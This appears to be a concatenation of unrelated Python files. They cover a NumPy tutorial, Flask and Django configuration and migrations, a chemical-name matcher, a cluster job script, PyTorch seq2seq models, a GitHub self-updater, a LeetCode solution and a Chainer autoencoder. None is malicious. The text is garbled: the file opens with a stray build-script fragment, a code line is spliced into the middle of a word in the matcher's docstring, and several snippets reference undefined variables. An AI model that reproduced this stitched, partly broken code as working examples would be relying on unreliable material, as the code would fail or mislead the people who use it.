AlwaysBuild(uploadeep)
Default([target_firm, target_size])
|
"""
[source](https://colab.research.google.com/github/google/eng-edu/blob/main/ml/cc/exercises/numpy_ultraquick_tutorial.ipynb?utm_source=mlcc)
> create/manipulate vectors and matrices
"""
import numpy as np
one_dim_array = np.array([1.3, 3.7, 4.3, 5.6, 7.9])
print(one_dim_array)
two_dim_array = np.array([[1.3, 3.7], [4.3, 5.6], [6.4, 7.9]])
print(two_dim_array)
seq_int = np.arange(3, 9)
print(seq_int)
rand_ints_between_10_and_50 = np.random.randint(low=10, high=51, size=(5))
print(rand_ints_between_10_and_50)
rand_floats_between_0_and_1 = np.random.random([5])
print(rand_floats_between_0_and_1)
rand_floats_between_1_and_2 = rand_floats_between_0_and_1 + 1.0
rand_floats_between_100_and_200 = rand_floats_between_1_and_2 * 100.0
"""
Task.1 Create a Linear Dataset
to create a simple dataset consisting single feature and label
* assign int sequence from 6 to 20 to a NumPy array name 'feature'
* assign 15 values to NumPy array named 'label' as: 'label = (3) (feature) + 4'; as first value be '(3) (6) + 4 = 22'
"""
feature = np.arange(6, 21)
print(feature)
label = (feature * 3) + 4.0
print(label)
"""
Task.2 Add some noise to the dataset
to mae dataset realistic; insert random noise to each element of 'label' array
* modify each value assigned to 'label' by adding different random float between -2/+2 without 'broadcasting'
instead create noise array having same dimension
"""
noise = (np.random.random([15]) * 4)
print(noise)
label = label + noise
print(label)
|
import os
basedir = os.path.abspath(os.path.dirname(__file__))
class Config:
SECRET_KEY = os.environ.get('SECRET_KEY') or 'hard to guess string'
SQLALCHEMY_COMMIT_ON_TEARDOWN = True
SQLALCHEMY_TRACK_MODIFICATIONS = False
MAIL_SERVER = 'smtp.googlemail.com'
MAIL_PORT = 587
MAIL_USE_TLS = True
MAIL_USERNAME = os.environ.get('MAIL_USERNAME')
MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD')
PROJECT_MAIL_SUBJECT_PREFIX = '[Project]'
PROJECT_MAIL_SENDER = 'Project Admin <project@example.com>'
PROJECT_ADMIN = os.environ.get('PROJECT_ADMIN')
CELERY_BROKER_URL = 'amqp://localhost//'
CELERY_RESULT_BACKEND = 'amqp://'
CELERY_INCLUDE = ['celery_worker']
SQL_USERNAME = os.environ.get('MYSQL_USERNAME')
SQL_PASSWORD = os.environ.get('MYSQL_PASSWORD')
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
DEBUG = True
SQLALCHEMY_DATABASE_URI = 'postgresql://' + str(Config.SQL_USERNAME) + ':' + str(
Config.SQL_PASSWORD) + '@localhost/testproject'
class TestingConfig(Config):
TESTING = True
SQLALCHEMY_DATABASE_URI = os.environ.get('TEST_DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data-test.sqlite')
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data.sqlite')
config = {
'development': DevelopmentConfig,
'testing': TestingConfig,
'production': ProductionConfig,
'default': DevelopmentConfig
}
|
"""TailorDev Biblio
Bibliography management with Django.
"""
__version__ = "2.0.0"
default_app_config = "td_biblio.apps.TDBiblioConfig"
|
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='SkipRequest',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('key', models.CharField(max_length=64, verbose_name='Sender Key')),
],
options={
'verbose_name': 'Skip request',
'verbose_name_plural': 'Skip requests',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Video',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('description', models.TextField(help_text='Description text for the video', verbose_name='Description', blank=True)),
('youtube_url', models.URLField(help_text='URL to a youtube video', verbose_name='Youtube URL')),
('key', models.CharField(max_length=64, null=True, verbose_name='Sender Key', blank=True)),
('deleted', models.IntegerField(default=False, verbose_name='Deleted')),
('playing', models.BooleanField(default=False, verbose_name='Playing')),
('duration', models.IntegerField(default=0, verbose_name='Duration')),
],
options={
'verbose_name': 'Video',
'verbose_name_plural': 'Videos',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='skiprequest',
name='event',
field=models.ForeignKey(verbose_name='Video', to='manager.Video'),
preserve_default=True,
),
]
|
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('snippets', '0006_snippet_last_used'),
]
operations = [
migrations.AlterModelOptions(
name='snippet',
options={'ordering': ('-updated_at',), 'verbose_name': 'snippet', 'verbose_name_plural': 'snippets'},
),
migrations.AlterField(
model_name='snippet',
name='description',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='description'),
),
migrations.AlterField(
model_name='snippet',
name='slug',
field=models.SlugField(max_length=255, verbose_name='name'),
),
migrations.AlterField(
model_name='snippet',
name='updated_at',
field=models.DateTimeField(blank=True, null=True, verbose_name='updated at'),
),
migrations.AlterField(
model_name='snippet',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='snippet', to=settings.AUTH_USER_MODEL),
),
]
|
import itertools, logging
from gibbs.models import CommonName, Compound, Enzyme
from haystack.query import SearchQuerySet
class Error(Exception):
pass
class IllegalQueryError(Error):
pass
class Match(object):
"""An object containing a string match and it's score."""
def __init__(self, key, value, score):
"""Initialize a Match.
Args:
key: the object that matched.
value: the value of the match (the object pointed to by the key).
score: between 0.0 and 1.0, higher is better.
"""
self.key = key
self.value = value
self.score = score
def __eq__(self, other):
"""Equality checking between matches, used for testing."""
return (self.key == other.key and
self.value == other.value and
self.score == other.score)
def __str__(self):
"""Get as a string for debugging/printability."""
return '<matcher.Match> value=%s, score=%f' % (self.value,
self.score)
def TypeStr(self):
if self.IsCompound():
return 'Compound'
elif self.IsEnzyme():
return 'Enzyme'
return ''
def IsCompound(self):
return isinstance(self.value, Compound)
def IsEnzyme(self):
return isinstance(self.value, Enzyme)
def Key(self):
if self.IsCompound():
return self.value.kegg_id
elif self.IsEnzyme():
return self.value.ec
return None
class Matcher(object):
"""A class that matches a string against the database.
The base implementation does exact matching.
"""
def __init__(self, max_results=10, min_score=0.0, match_enzymes=True):
"""Initializes the Matcher.
Args:
scorer: a MatchScorer object for scoring.
max_results: the maximum number of matches to return.
min_score: the minimum match score to return.
"""
self._max_results = max_results
self._min_score = min_score
self._match_enzymes = match_enzymes
self._prefetch_objects = ['compound_set']
if self._match_enzymes:
self._prefetch_objects.extend(['enzyme_set', 'enzyme_set__reactions'])
def _AcceptQuery(self, query):
"""Accept or rejec expression = self._PrepareExpression(query)
results = models.CommonName.objects.filter(name__iregex=expression)t the query.
Returns:
True if the query is accepted.
"""
if query.strip():
return True
return False
def _PreprocessQuery(self, query):
"""Perform pre-search query manipulation.
Default implementation simply strips leading/trailing whitespace
and makes the query lowercase.
Args:
query: the string query.
Returns:
The pre-processed query as a string.
"""
query = query.strip().lower()
return query
def _PrepocessCandidate(self, candidate):
"""Perform pre-match candidate manipulation.
Default implementation converts to a lower-case string.
Args:
candidate: the candidate object (convertible to a string).
Returns:
The pre-processed candidate as a string.
"""
return str(candidate).strip().lower()
def _FindNameMatches(self, query):
"""Find all the matches for this query.
Args:
query: the query to match.
Returns:
A list of CommonName objects matching the query.
"""
try:
res = SearchQuerySet().filter(text__exact=query).best_match()
return [res.object]
except Exception as e:
logging.warning('Query failed: ' + str(e))
return []
def _MakeMatchObjects(self, common_names):
"""Given the list of CommonNames, make the Matches.
Args:
common_names: a list of CommonNames.
Returns:
A list of Match objects.
"""
matches = []
for name in common_names:
for compound in name.compound_set.all():
matches.append(Match(name, compound, 0.0))
if self._match_enzymes:
for enzyme in name.enzyme_set.all():
matches.append(Match(name, enzyme, 0.0))
return matches
def _GetScore(self, query, match):
"""Get the score for a query-match pair.
Args:
query: the query string.
match: the Match object.
Returns:
A score between 0.0 and 1.0.
"""
query_len = float(len(query))
candidate_len = float(len(str(match.key)))
return (query_len / candidate_len)
def _ScoreMatches(self, query, matches):
"""Set the match scores for all matches.
Args:
query: the query string.
matches: a list of match objects with uninitialized scores.
"""
for m in matches:
m.score = self._GetScore(query, m)
def _FilterMatches(self, matches):
"""Filter the match list for min score.
Args:
matches: an unfiltered list of match objects.
"""
# Filter matches without data or beneath the score limit.
f = lambda match: (match.score >= self._min_score and
match.value)
filtered = filter(f, matches)
# Take only unique matches.
group_key = lambda match: match.Key()
filtered_matches = []
for _, g in itertools.groupby(filtered, key=group_key):
# Keep the unique match with the top score.
max_match = None
for match in g:
if not max_match or max_match.score < match.score:
max_match = match
filtered_matches.append(max_match)
return filtered_matches
def _SortAndClip(self, matches):
matches.sort(key=lambda m: m.score, reverse=True)
return matches[:self._max_results]
def Match(self, query):
"""Find matches for the query in the library.
Args:
query: the string query.
Returns:
A sorted list of Match objects or None if
the query could not be parsed.
"""
if not self._AcceptQuery(query):
raise IllegalQueryError('%s is not a valid query' % query)
processed_query = self._PreprocessQuery(query)
logging.debug('Query = %s' % processed_query)
name_matches = self._FindNameMatches(processed_query)
logging.debug('Found %d name matches' % len(name_matches))
matches = self._MakeMatchObjects(name_matches)
self._ScoreMatches(processed_query, matches)
matches = self._FilterMatches(matches)
logging.debug('Found %d matches' % len(matches))
return self._SortAndClip(matches)
|
from sys import version_info
import copy
import types
try:
from collections import OrderedDict
except ImportError: # pragma: nocover
# Django < 1.5 fallback
from django.utils.datastructures import SortedDict as OrderedDict # noqa
if version_info < (2, 7, 0):
def _deepcopy_method(x, memo):
return type(x)(x.im_func, copy.deepcopy(x.im_self, memo), x.im_class)
copy._deepcopy_dispatch[types.MethodType] = _deepcopy_method
|
import os, sys, re
import ConfigParser
import optparse
import shutil
import subprocess
import difflib
import collections
def parse_options():
'''
This function parses the command line arguments and returns an optparse object.
'''
parser = optparse.OptionParser("pddi.py [--dummy=DUMMY_DIR] -i INPUT_FILE [-o OUTPUT_DIR] [-v]")
# Directory arguments
parser.add_option("-i", action="store", type="string", dest="input_file", help="Input crossings file", metavar="INPUT_FILE")
parser.add_option("-s", action="store", type="string", dest="sif_file", help="Input SIF file")
parser.add_option("-t", action="store", type="string", dest="type_of_analysis", help="Type of analysis: 'profile_creation' or 'comparison'")
parser.add_option("--dummy_dir", default="dummy/", action="store", type="string", dest="dummy_dir", help="Dummy directory (default = ./)", metavar="DUMMY_DIR")
parser.add_option('-ws','--worspace',dest='workspace',action = 'store',default=os.path.join(os.path.dirname(__file__), 'workspace'),
help = """Define the workspace directory where the data directory and the results directory will be created""")
(options, args) = parser.parse_args()
if options.input_file is None or options.sif_file is None or options.type_of_analysis is None:
parser.error("missing arguments: type option \"-h\" for help")
return options
src_path = os.path.abspath(os.path.dirname(__file__))
sys.path.append(src_path)
config = ConfigParser.ConfigParser()
config_file = os.path.join(src_path, "config_marvin.ini")
config.read(config_file)
import hashlib
import functions
python = os.path.join(config.get("Paths", "python_path"), "python")
options = parse_options()
input_file = os.path.abspath(options.input_file)
dummy_dir = os.path.abspath(options.dummy_dir)
logs_dir = src_path + "/logs"
if not os.path.exists(logs_dir):
os.mkdir(logs_dir)
f = open(input_file, "r")
if options.type_of_analysis == 'profile_creation':
analysis = '-prof'
all_drugs = set()
for line in f:
(drug1, drug2) = line.strip().split('---')
all_drugs.add(drug1)
all_drugs.add(drug2)
f.close()
for drug in all_drugs:
# Check if the p-value file is already created. If so, skip
pvalue_file = data_dir + "/" + drug + "/guild_results_using_sif/output_scores.sif.netcombo.pval"
if os.path.exists(pvalue_file):
continue
guild_path = '/gpfs42/robbyfs/homes/users/qaguirre/guild/scoreN'
command = 'python {}/diana_cluster/scripts/generate_profiles.py -d {} -pt geneid -sif {} -gu {}'.format( src_path, drug, options.sif_file, guild_path )
print(command)
# python /home/quim/project/diana_cluster/scripts/generate_profiles.py -d 'DCC0303' -pt 'geneid' -sif /home/quim/project/diana_cluster/workspace/sif/human_eAFF_geneid_2017.sif -gu /home/quim/project/diana_cluster/diana/toolbox/scoreN
# To run the command at the local machine
#os.system(command)
#To run in the cluster submitting files to queues
functions.submit_command_to_queue(command, max_jobs_in_queue=int(config.get("Cluster", "max_jobs_in_queue")), queue_file="command_queues_marvin.txt", dummy_dir=dummy_dir)
elif options.type_of_analysis == 'comparison':
analysis = '-comp'
for line in f:
(drug1, drug2) = line.strip().split('---')
# Check if the results are already done
comp_results_dir = res_dir + "/results_" + drug1 + "_" + drug2
table_file = comp_results_dir + '/table_results_' + drug1 + '_' + drug2 + '.txt'
if os.path.exists(table_file):
continue
command = 'python {}/diana_cluster/scripts/compare_profiles.py -d1 {} -d2 {} -pt geneid'.format( src_path, drug1, drug2 )
print(command)
# python /home/quim/project/diana_cluster/scripts/compare_profiles.py -d1 'DCC0303' -d2 'DCC1743' -pt 'geneid'
# To run the command at the local machine
#os.system(command)
#To run in the cluster submitting files to queues
functions.submit_command_to_queue(command, max_jobs_in_queue=int(config.get("Cluster", "max_jobs_in_queue")), queue_file="command_queues_marvin.txt", dummy_dir=dummy_dir)
f.close()
else:
print('The type of analysis has been wrongly defined. Introduce \'profile_creation\' or \'comparison\'')
sys.exit(10)
|
from __future__ import print_function
import torch as th
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
from torch.nn.utils.rnn import PackedSequence, pack_padded_sequence, pad_packed_sequence
class Vocabulary(object):
def __init__(self, tokens, unk_idx):
self.tokens = tokens
self.unk_idx = unk_idx
self.vocab_size = len(tokens)
self.forward_dict = dict((token, i) for i, token in enumerate(tokens))
self.backward_dict = dict(enumerate(tokens))
def encode(self, tokens):
return [self.forward_dict.get(token, self.unk_idx) for token in tokens]
def decode(self, ids):
return [self.backward_dict.get(idx, "<UNK>") for idx in ids]
def batch_encode(self, inputs):
batch = [self.encode(token) for token in inputs]
max_len = max(map(len, batch))
batch = [ids + (max_len - len(ids))*[0] for ids in batch]
return batch
def __len__(self):
return len(self.tokens)
class Bilinear(nn.Module):
"""
Documentation for Bilinear
"""
def __init__(self, first_dim, second_dim, out_dim):
super(Bilinear, self).__init__()
self.first_dim = first_dim
self.second_dim = second_dim
self.out_dim = out_dim
self.weights = nn.Parameter(data=th.randn(first_dim, second_dim, out_dim).double(),
requires_grad=True)
def forward(self, input1, input2):
# preconditions
assert input1.ndimension() == 2, "Inputs must be matrices (2-dimensional). Input 1 has {} dimensions.".format(input1.ndimension())
assert input2.ndimension() == 2, "Inputs must be matrices (2-dimensional). Input 2 has {} dimensions.".format(input2.ndimension())
assert input1.size(1) == self.first_dim, "Input 1's shape is inconsistent with the bilinear weight matrix."
assert input2.size(1) == self.second_dim, "Input 2's shape is inconsistent with the bilinear weight matrix."
assert input1.size(0) == input2.size(0), """Input batch sizes must be equal.
Input 1 has batch size {}, while input 2 has batch size {}.""".format(input1.size(0), input2.size(0))
# computation
batch_size = input1.size(0)
input1_expanded = input1.unsqueeze(2).unsqueeze(3).expand(batch_size, self.first_dim,
self.second_dim, self.out_dim)
input2_expanded = input2.unsqueeze(1).unsqueeze(3).expand(batch_size, self.first_dim,
self.second_dim, self.out_dim)
weights_expanded = self.weights.unsqueeze(0).expand(batch_size, self.first_dim,
self.second_dim, self.out_dim)
output = (weights_expanded*input1_expanded*input2_expanded).sum(1).sum(2)
return output.squeeze(1).squeeze(1)
class EncoderRNN(nn.Module):
"""
Documentation for EncoderRNN
"""
def __init__(self, vocab, embed_dim, hidden_dim):
super(EncoderRNN, self).__init__()
self.vocab = vocab
self.vocab_size = len(vocab)
self.embedding = nn.Embedding(self.vocab_size, embed_dim)
self.embedding.double()
self.rnn = nn.LSTM(embed_dim, hidden_dim,
batch_first=True, bias=False)
self.rnn.double()
def forward(self, input, h0, c0, lens=None):
embedded = self.embedding(input)
if lens:
embedded = pack_padded_sequence(embedded, lens, batch_first=True)
output, (hn, cn) = self.rnn(embedded, (h0, c0))
return output, hn, cn
def load_embeddings(self, weights, fix_weights=True):
self.embedding.weight.data = weights
if fix_weights:
self.embedding.weight.requires_grad = False
class DecoderRNN(nn.Module):
"""
Documentation for DecoderRNN
"""
def __init__(self, vocab, start_idx, end_idx, embed_dim, hidden_dim):
super(DecoderRNN, self).__init__()
self.vocab = vocab
self.start_idx = start_idx
self.end_idx = end_idx
self.encoder = EncoderRNN(vocab, embed_dim, hidden_dim)
self.scorer = nn.Sequential(nn.Linear(hidden_dim, len(vocab)),
nn.LogSoftmax())
self.scorer.double()
def load_embeddings(self, weights, fix_weights=True):
self.encoder.load_embeddings(weights, fix_weights)
def forward(self, input, h0, c0, lens=None):
output, hn, cn = self.encoder(input, h0, c0, lens)
if lens:
output, _ = pad_packed_sequence(output)
logprobs = self.scorer(output.contiguous().view(output.size(0)*output.size(1), output.size(2)))
logprobs = logprobs.view(output.size(0), output.size(1), logprobs.size(1))
return logprobs, hn, cn
def generate(self, h0, c0, method="beam", **kwargs):
generator = {"greedy": self.greedy_decode,
"beam": self.beam_decode,
"sample": self.temperature_sample}.get(method)
ids = generator(h0, c0, **kwargs)
tokens = self.vocab.decode(ids)
return tokens
def temperature_sample(self, h0, c0, temp=1, max_length=20, **kwargs):
pass
def greedy_decode(self, h0, c0, max_length=20, **kwargs):
pass
def beam_decode(self, h0, c0, beam_size=5, max_length=10, cuda=False, **kwargs):
def get_ij(idx, n):
j = idx % n
i = (idx - j)/n
return i, j
beam = []
completed = []
prune_factor = float("-inf")
start_symbol = Variable(th.LongTensor([self.start_idx]))
beam_symbols = start_symbol.unsqueeze(1)
if cuda:
start_symbol = start_symbol.cuda()
beam_symbols = beam_symbols.cuda()
scores, out_h, out_c = self.forward(beam_symbols, h0, c0)
top_scores, top_ids = scores.view(scores.numel()).sort(0, True)
_, dim_beam, dim_vocab = scores.size()
for idx in range(min(beam_size, dim_vocab)):
i, j = get_ij(top_ids[idx], dim_vocab)
if cuda:
j = j.cuda()
seq = th.cat([start_symbol, j])
score = top_scores[idx]
if j.data[0] == self.end_idx:
completed.append({"seq": seq.data.tolist(), "score": score})
prune_factor = top_scores[idx].data[0]
else:
beam.append({"seq": seq, "h": out_h[:, 0, :],
"c": out_c[:, 0, :], "score": score})
count = 0
while len(beam) > 0 and count < max_length:
beam_symbols = th.cat([item["seq"][-1].unsqueeze(1) for item in beam], 0)
beam_h = th.cat([item["h"].unsqueeze(1) for item in beam], 1)
beam_c = th.cat([item["c"].unsqueeze(1) for item in beam], 1)
log_probs, out_h, out_c = self.forward(beam_symbols, beam_h, beam_c)
dim_beam, _, dim_vocab = log_probs.size()
beam_scores = th.cat([item["score"] for item in beam]).unsqueeze(1).unsqueeze(1)
beam_scores = beam_scores.expand(dim_beam, 1, dim_vocab)
scores = beam_scores + log_probs
top_scores, top_ids = scores.view(scores.numel()).sort(0, True)
new_beam = []
for idx in range(min(beam_size, len(beam))):
score = top_scores[idx]
i, j = get_ij(top_ids[idx], dim_vocab)
if (score.data[0] >= prune_factor):
seq = th.cat([beam[i.data[0]]["seq"], j])
if j.data[0] == self.end_idx:
completed.append({"seq": seq.data.tolist(), "score": score})
prune_factor = score.data[0]
else:
new_beam.append({"seq": seq, "h": out_h[:, i.data[0], :],
"c": out_c[:, i.data[0], :], "score": score})
else:
break
beam = new_beam
count += 1
return completed[-1]["seq"]
class Seq2Seq(nn.Module):
"""
Documentation for Seq2Seq
"""
def __init__(self, in_vocab, out_vocab, in_embed_dim,
out_embed_dim, hidden_dim, transfer):
super(Seq2Seq, self).__init__()
self.in_vocab = in_vocab
self.out_vocab = out_vocab
self.hidden_dim = hidden_dim
self.h0 = nn.Parameter(th.randn(1, 1, hidden_dim).double())
self.c0 = nn.Parameter(th.randn(1, 1, hidden_dim).double())
self.encoder = EncoderRNN(in_vocab, in_embed_dim, hidden_dim)
self.decoder = DecoderRNN(out_vocab, 1, 2,
out_embed_dim, hidden_dim)
self.transfer = transfer
def forward(self, input, output, input_lens=None, output_lens=None, lookup=None, **kwargs):
h0 = self.h0.expand(1, input.size(0), self.hidden_dim).contiguous()
c0 = self.c0.expand(1, input.size(0), self.hidden_dim).contiguous()
input_encoded, input_h, input_c = self.encoder(input, h0, c0, lens=input_lens)
if lookup:
input_h = th.index_select(input_h, 1, lookup)
input_c = th.index_select(input_c, 1, lookup)
transfer_h, transfer_c = self.transfer(input_h, input_c, **kwargs)
log_probs, _, _ = self.decoder(output, transfer_h, transfer_c, lens=output_lens)
return log_probs
def generate(self, input_seq, method="beam", cuda=False, **kwargs):
input_ids = self.in_vocab.encode(input_seq.split(" "))
input = Variable(th.LongTensor(input_ids)).unsqueeze(0)
h0 = Variable(th.zeros(1, 1, self.hidden_dim).contiguous())
c0 = Variable(th.zeros(1, 1, self.hidden_dim).contiguous())
if cuda:
input = input.cuda()
h0 = h0.cuda()
c0 = c0.cuda()
input_encoded, input_h, input_c = self.encoder(input, h0, c0)
transfer_h, transfer_c = self.transfer(input_h, input_c, **kwargs)
output = self.decoder.generate(transfer_h, transfer_c, method=method, cuda=cuda, **kwargs)
return " ".join(output)
class IdentityTransfer(nn.Module):
def __init__(self):
super(IdentityTransfer, self).__init__()
def forward(self, h, c, **kwargs):
return h, c
class GatedBilinearTransfer(nn.Module):
def __init__(self, in_dim, gate_dim, hidden_dim,
out_dim, target="h"):
super(GatedBilinearTransfer, self).__init__()
self.target = target
self.in_bilinear = Bilinear(in_dim, gate_dim, hidden_dim)
self.tanh = nn.Tanh()
self.out_bilinear = Bilinear(hidden_dim, gate_dim, out_dim)
def forward(self, h, c, g, **kwargs):
if self.target in ["h", "both"]:
h = self.in_bilinear(h.squeeze(0), g)
h = self.tanh(h)
h = self.out_bilinear(h, g).unsqueeze(0)
if self.target in ["c", "both"]:
c = self.in_bilinear(c.squeeze(0), g)
c = self.tanh(c)
c = self.out_bilinear(c, g).unsqueeze(0)
return h, c
class PairClassifier(nn.Module):
"""
A classifier for pairs of sequences.
"""
def __init__(self, voab_1, vocab_2, embed_dim_1, embed_dim_2,
hidden_dim, class_dim, pair_encoder, n_layers,
n_classes, class_hidden_dim):
super(PairClassifier, self).__init__()
self.first_encoder = EncoderRNN(vocab_1, embed_dim_1, hidden_dim)
self.second_encoder = EncoderRNN(vocab_2, embed_dim_2, hidden_dim)
self.pair_encoder = pair_encoder
self.classifier = nn.Sequential(nn.Linear(class_dim, class_hidden_dim), nn.Tanh())
for i in range(n_layers):
self.classifier.add(nn.Linear(class_hidden_dim, class_hidden_dim))
self.classifier.add(nn.Tanh())
self.classifier.add(nn.Linear(class_hidden_dim, n_classes))
self.classifier.add(nn.LogSoftmax())
def forward(self, input_1, input_2):
h_1, hn_1, cn_1 = self.first_encoder(input1)
h_2, hn_2, cn_2 = self.second_encoder(input2)
encoded = self.pair_encoder(h_1, hn_1, cn_1, h_2, hn_2, cn_2)
probs = self.classifier(encoded)
return probs
class ConcatPairClassifier(PairClassifier):
"""
A classifier for pairs of sequences that embeds and then concatenates them.
"""
def __init__(self, voab_1, vocab_2, embed_dim_1, embed_dim_2,
hidden_dim, n_layers, n_classes, class_hidden_dim):
#TODO add code for concatenation-based `pair_encoder`
super(PairClassifier, self).__init__(voab_1, vocab_2, embed_dim_1, embed_dim_2,
hidden_dim, class_dim, pair_encoder, n_layers,
n_classes, class_hidden_dim)
|
import mongoengine as db
class User(db.Document):
user_id = db.StringField(required=True, unique=True)
created = db.DateTimeField(required=True)
last_login = db.DateTimeField()
nino = db.StringField()
linked_ids = db.ListField(db.ReferenceField('User'), default=[])
def link(self, other):
self.update(push__linked_ids=other)
other.update(push__linked_ids=self)
|
'''
Module that update the software and its databases
'''
import os
import shutil
from sys import exit
import os.path
import tarfile
import requests
from bs4 import BeautifulSoup
from ...base import *
from ...sentry import sentry
from ...clint import progress
class Updater(object):
def __init__(self, path, ver, url):
self.inst_path = path
self.repo_url = url
self.version = ver
def update_all(self):
'''
Upgrade BigBrother completely
'''
print(color.info.info("Fetching version from Github..."))
# Retrieving github releases
try:
response = requests.get(self.repo_url)
except requests.exceptions.RequestException as e:
print(color.info.error(e))
return
# Getting latest release
soup = BeautifulSoup(response.content, 'html.parser')
try: # Parsing info from page
version = soup.select("ul.tag-references > li > a > span")[0].text
download_url = "https://github.com" + \
soup.select(".release-downloads > li > a")[1]['href']
except Exception as e:
sentry.client.captureException()
print(color.info.error(e))
return
# check version
if version == self.version:
print(color.info.info("You have already the latest version"))
else:
print(color.info.info("New version " + color.bold(
"{ver}".format(ver=version)) + " found"))
# install
if self.install(self.inst_path, download_url):
print(color.info.info("Need to be restarted for changes to be effective"))
exit()
def install(self, path, url):
try:
# downloaded file name
dl_file = self.download(url, path)
# change directory
os.chdir(path)
# extract in path directory
inst_module = self.extract(dl_file)
# normalize name
inst_module_norm = inst_module[:inst_module.find('-')]
if inst_module_norm in os.listdir():
shutil.rmtree(inst_module_norm)
shutil.move(inst_module, inst_module_norm)
print(color.info.info(color.info.success("Installation completed")))
return 1
except Exception as e:
print(color.info.info(color.info.fail("Installation failed")))
print(color.info.error(e))
return 0
def download(self, url, path):
'''
Download module from [url] to [path]
'''
# get name of file to downaload
local_filename = url.split('/')[-1]
try:
stream = requests.get(url, stream=True)
total_length = int(stream.headers['Content-Length'])
except requests.exceptions.RequestException as e:
print(color.info.error(e))
return
# change to downlaod dir
try:
os.chdir(path)
except Exception as e:
print(color.info.error(e))
return
# write on file
with open(local_filename, 'wb') as f:
for chunk in progress.bar(stream.iter_content(chunk_size=1024),
label=local_filename, expected_size=(total_length/1024)):
if chunk:
f.write(chunk)
f.flush()
return local_filename
def extract(self, filename):
try:
tar = tarfile.open(filename)
repo = tar.getnames()[0]
# remove old repo
if repo in os.listdir():
shutil.rmtree(repo)
# extract in current directory
tar.extractall()
return repo
except Exception as e:
print(color.info.error(e))
return
finally:
tar.close()
os.remove(filename)
|
from venv import _venv
from fabric.api import task
@task
def migrate():
"""
Run Django's migrate command
"""
_venv("python manage.py migrate")
@task
def syncdb():
"""
Run Django's syncdb command
"""
_venv("python manage.py syncdb")
|
import sys
import os.path
from xml.etree import ElementTree as et
if len(sys.argv) != 3:
raise Exception("Expected at least 2 args, {} given!".format(len(sys.argv) - 1))
version = sys.argv[1]
csprojPath = sys.argv[2]
if not os.path.isfile(csprojPath):
raise Exception("File {} does not exist!".format(csprojPath))
tree = et.parse(csprojPath)
root = tree.getroot()
versionLeaf = root.find('PropertyGroup[1]/Version')
if versionLeaf != None:
versionLeaf.text = version
tree.write(csprojPath)
|
from setuptools import setup, find_packages
import sys
extra_install = []
if sys.version_info <= (3,1):
extra_install.append('futures')
if sys.version_info <= (3,6):
extra_install.append('pysha3')
setup(
name="moneywagon",
version='{{ version }}',
description='Next Generation Cryptocurrency Platform',
long_description=open('README.md').read(),
author='Chris Priest',
author_email='cp368202@ohiou.edu',
url='https://github.com/priestc/moneywagon',
packages=find_packages(),
scripts=['bin/moneywagon'],
include_package_data=True,
license='LICENSE',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
],
install_requires=[
'requests',
'tabulate',
'base58',
'pytz',
'arrow',
'bitcoin',
'beautifulsoup4'
] + extra_install
)
|
from heapq import heapify, heapreplace
class Solution(object):
def kthSmallest(self, matrix, k):
"""
:type matrix: List[List[int]]
:type k: int
:rtype: int
"""
if len(matrix) is 1:
return matrix[0][0]
z = zip(*matrix[1:])
h = [(matrix[0][i], z[i]) for i in xrange(len(matrix))]
heapify(h)
i = 0
while i < k - 1:
val, nextval = h[0]
if nextval:
heapreplace(h, (nextval[0], nextval[1:]))
else:
heappop(h)
i += 1
return h[0][0]
a = [[1,5,10], [4,5,11], [7,8,12]]
s = Solution()
print s.kthSmallest(a, 3)
|
import json, sys, glob, datetime, math, random, pickle, gzip
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import chainer
from chainer import computational_graph as c
from chainer import cuda
import chainer.functions as F
from chainer import optimizers
class AutoEncoder:
def __init__(self, n_units=64):
self.n_units = n_units
def load(self, train_x):
self.N = len(train_x[0])
self.x_train = train_x
#
self.model = chainer.FunctionSet(encode=F.Linear(self.N, self.n_units),
decode=F.Linear(self.n_units, self.N))
print("Network: encode({}-{}), decode({}-{})".format(self.N, self.n_units, self.n_units, self.N))
#
self.optimizer = optimizers.Adam()
self.optimizer.setup(self.model.collect_parameters())
def forward(self, x_data, train=True):
x = chainer.Variable(x_data)
t = chainer.Variable(x_data)
h = F.relu(self.model.encode(x))
y = F.relu(self.model.decode(h))
return F.mean_squared_error(y, t), y
def calc(self, n_epoch):
for epoch in range(n_epoch):
self.optimizer.zero_grads()
loss, y = self.forward(self.x_train)
loss.backward()
self.optimizer.update()
#
print('epoch = {}, train mean loss={}'.format(epoch, loss.data))
def getY(self, test_x):
self.test_x = test_x
loss, y = self.forward(x_test, train=False)
return y.data
def getEncodeW(self):
return self.model.encode.W
def load_mnist():
with open('mnist.pkl', 'rb') as mnist_pickle:
mnist = pickle.load(mnist_pickle)
return mnist
def save_mnist(s,l=28,prefix=""):
n = len(s)
print("exporting {} images.".format(n))
plt.clf()
plt.figure(1)
for i,bi in enumerate(s):
plt.subplot(math.floor(n/6),6,i+1)
bi = bi.reshape((l,l))
plt.imshow(bi, cmap=cm.Greys_r) #Needs to be in row,col order
plt.axis('off')
plt.savefig("output/{}.png".format(prefix))
if __name__=="__main__":
rf = AutoEncoder(n_units=64)
mnist = load_mnist()
mnist['data'] = mnist['data'].astype(np.float32)
mnist['data'] /= 255
x_train = mnist['data'][0:2000]
x_test = mnist['data'][2000:2036]
rf.load(x_train)
save_mnist(x_test,prefix="test")
for k in [1,9,90,400,1000,4000]:
rf.calc(k) # epoch
yy = rf.getY(x_test)
ww = rf.getEncodeW()
